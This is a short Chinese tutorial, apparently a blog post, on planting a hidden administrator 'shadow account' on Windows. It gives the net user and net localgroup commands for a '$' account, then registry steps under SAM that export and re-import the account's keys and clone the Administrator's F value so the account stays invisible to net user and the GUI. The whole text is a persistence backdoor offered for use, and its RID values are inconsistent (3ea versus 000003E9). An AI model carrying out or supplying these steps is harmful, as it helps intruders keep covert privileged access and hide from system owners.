windows 创建隐藏账户

>在创建的用户名后加$，即为隐藏账户

>>命令：net user test$ admin /add  //添加隐藏用户

net localgroup administrators test$ /add  //加入到管理员组中

 >>展开注册表[HKEY_LOCAL_MACHINE\SAM\SAM],默认情况下这个项里没有任何内容，这是因为用户对它没有权限。右键菜单里为administrator赋予完全控制权限。

>>在[SAMDomains\AccountUserslNames]项里显示了系统当前存在的所有账户，选中test$, 在其右侧有一个名为“默认”，类型为"0x3ea"的键值。其中的“3ea"就是test$用户SID的结尾，即RID (这里使用十六进制表示）。

在[SAM\Domains\Account\Users]里有一个以“3EA"结尾的子项，这两个项里都是存放了用户test$的信息。

在这两个项上单击右键，执行“导出”命令，将这两个项的值分别导出成扩展名为.reg的注册表文件。

>>cmd中将test$用户删除，再次刷新注册表，此时上述的两项都没有了。

>>下面再将刚才导出的两个注册表文件重新导入，此时在注册表里就有了test$账户的信息，但无论在命令行还是图形界面都无法看到这个账户，账户就被彻底隐藏了。使用这个隐藏账户可以登录系统，但缺点是仍然会产生用户配置文件，下 面再对这个账户做进一步处理，以使之完全隐藏。

>>展开到上面的注册表项中，找到administrator用户 的RID值“1f4”,展开对应的“000001 F4"项，其右侧有一个名为f的键值，这个键值中就存放了用户的SID。下面将这个键值的数据全部复制，并粘贴到“000003E9"项的f键值中，也就是将administrator用户的SID复制给了test$,这样在操作系统内部，实际上就把test$当做是administrator, test$ 成了administrator的影子账户，与其使用同一个用户配置文件，test$也就被彻底隐藏了。

 

使用命令查看所有用户：net user（没有该用户）

界面中查看也没有该用户

<<<<<<彻底隐藏起来了。